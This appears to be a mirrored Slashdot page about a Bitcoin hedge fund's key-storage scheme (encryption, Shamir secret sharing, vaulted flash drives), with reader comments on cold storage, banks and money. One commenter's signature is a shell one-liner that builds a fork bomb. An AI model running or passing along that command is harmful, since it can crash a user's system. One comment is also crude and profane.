Slashdot Mirror

← Back to Stories (view on slashdot.org)

How the First Bitcoin Hedge Fund Approaches Security

Posted by timothy on from the I'm-thinking-of-a-number dept.

An anonymous reader writes with a link to a story at Forbes about what's said to the first Bitcoin hedge fund; the article goes into some of the details of how the (literally) valuable data is kept. A selection: "The private key itself is AES-256 encrypted. After exporting Bitcoin private keys from wallet.dat file, data is stored in a TrueCrypt container on three separate flash drives. Using Shamir's Secret Sharing algorithm, the container password is then split into three parts utilizing a 2-of-3 secret sharing model. Incorporating physical security with electronic security, each flash drive from various manufacturers is duplicated several times and, together with a CD-ROM, those items are vaulted in a bank safety deposit box in three different legal jurisdictions. To leverage geographic distribution as well, each bank stores only part of a key, so if a single deposit box is compromised, no funds are lost."

15 of 124 comments (clear)

  1. Really? by Anonymous Coward · · Score: 2, Insightful

    So hundreds of thousand of dollars of peoples money (most of it virtual none the less) relying on some $50 flash drives.....No thanks. Ill pass.

    1. Re:Really? by __aaltlg1547 · · Score: 4, Insightful

      So hundreds of thousand of dollars of peoples money (most of it virtual none the less) relying on some $50 flash drives.....No thanks. Ill pass.

      You think the bank's computer systems are safer?

    2. Re:Really? by 1s44c · · Score: 2

      No.

      There is nothing as secure as a computer system that's switched off. These keys are off-line, distributed, and safely stored. Nothing any bank has is better than that.

    3. Re:Really? by 1s44c · · Score: 2

      What about the lock in the first place?

      Good question but the bitcoin lock in question has been proved secure. It's 256 bit ECDSA.

    4. Re:Really? by Hal_Porter · · Score: 2

      How do you reckon those financial services people afford all that cocaine? More to the point how good would you be at your job if you put Bolivian Marching powder on your Rice Krispies in the morning instead of sugar and then put so much Charlie up your nose you could see the pixies dance on you monitor while you stuffed a tampon up each bleeding nostril by lunchtime?

      That's literally the reality of financial services. Literally. They snort your life savings and then make up some crazy cokehead shit about 'CDOs' and 'how it turns out the market has seriously mispriced risk' and then go back to their office and wash the bits of hooker off their Armani suit and try to work out how they'll get the Fischer account off that weasel Paul Allen.

      Wake up man. There never were any CDOs or 'credit default swaps' or 'market'. All that happens is that your money gets turned into Columbian Nose Candy and put into a huge trough and all these red braced, stripy shirted fucks snuffled in it like Scarface, baying like elk in heat.

      --
      echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
    5. Re:Really? by thegarbz · · Score: 2

      No.

      But banks are regulated and abide by lots of consumer protection laws. Bitcoin exchanges .... well I haven't heard anything of the sorts yet.

      When a giant bank gets hacked the people usually end up getting their money back. Hell when an end user gets hacked and someone cleans out their bank account they often end up getting their money back.

      When some small bitcoin exchange gets taken to the cleaners ... well we'll see.

  2. Re:Pizza Analogy by r1348 · · Score: 2

    A pizza is split in 3 parts, and kept in 3 different banks in 3 countries. Bank robbers never get a full pizza.

  3. Re:Literally by Anonymous Coward · · Score: 2, Funny

    Because they are literally stupid.

  4. Armory by Wonko+the+Sane · · Score: 4, Insightful

    Armory as a Bitcoin client would have been a better choice for this, since they could have used the same 2-of-3 method for storing the private keys, but then they'd have the ability to use watching-only copies of the wallet for accounting and auditing purposes.

  5. Re:For the love of god, shut up about buttcoins! by Anonymous Coward · · Score: 2, Insightful

    Scanning down through the day I can't find another story more fitting of the site's slogan "News for nerds, stuff that matters." As a nerd, news that a crypto-anarchists P2P currency has reached the stage of hedge funds only 4 years after being launched and details of how the fund manager intends to secure the keys for customers is simply fascinating.

  6. This makes no sense... by nweaver · · Score: 2, Interesting

    Such procedures only work for cold storage of Bitcoin: wallets where you have no access to them. Basically, the equivalent of a bank vault for gold: its there, its sitting, but you can't actually do anything with it. Worse, unlike a bank vault, you can't transfer the bitcoins while they are in this vault.

    Therefore, the hedge fund's only strategy for these wallets is to buy BitCoins and sit on them. And do nothing. Which, if you believe in BitCoin, makes sense (the design is hyper-deflationary, so the only rational thing to do with BitCoins is to hold BitCoins), but thats hardly what you'd call a hedge-fund strategy.

    So how can you call it a hedge fund when all it can do is buy & hold?

    --
    Test your net with Netalyzr
    1. Re:This makes no sense... by IamTheRealMike · · Score: 3, Insightful

      That's pretty much what all hedge funds do, isn't it? Pick some asset they think will grow in value, buy it up (often using leverage), and then wait to see if their bet works out. Often they wait long periods of time. The fund is being targeted at people with lots of money and enormous appetite for risk - for these people, there aren't enough direct investment targets (like startups) so the easiest way to invest in the future success or failure of Bitcoin is indeed, buy and hold.

  7. Re:Pizza Analogy by alexander_686 · · Score: 2

    What you saying is correct, but I am missing a step here.

    You hand over your bitcoins for the fund to invest. They split the bitcoins into 3 pieces. o.k. - but how is that investing? If they are just keeping the bitcoins secure that is not even banking.

  8. Re:Pizza Analogy by __aaltlg1547 · · Score: 2

    A pizza is split in 3 parts, and kept in 3 different banks in 3 countries. Bank robbers never get a full pizza.

    But if they stole any part of the pizza, could you eat the rest?

  9. Re:What is this "bitcoin" you speak of? by hedwards · · Score: 3, Informative

    I wish people would stop saying that. Yes, they are fiat currencies, but that does not mean they aren't real money or that all fiat currencies are equally arbitrary in valuation.

    The value of the USD is measured against other currencies and against the things which one would like to buy. In most cases it doesn't really matter to me what it's doing versus the RMB or the CAD as I don't convert my money to pay for things brought in from those countries, I pay a price denominated in USD. Now, in practice shifts in those currency exchange rates will affect how much I pay, but so do all sorts of things that could affect domestically created things as well.

    Bottom line, the folks claiming that fiat currencies aren't real don't have any idea what they're talking about. Currency is just for convenience so that you don't have to buy an entire cow just because you want a T-bone, don't want to take delivery immediately or want to do a 3 or 4 way trade.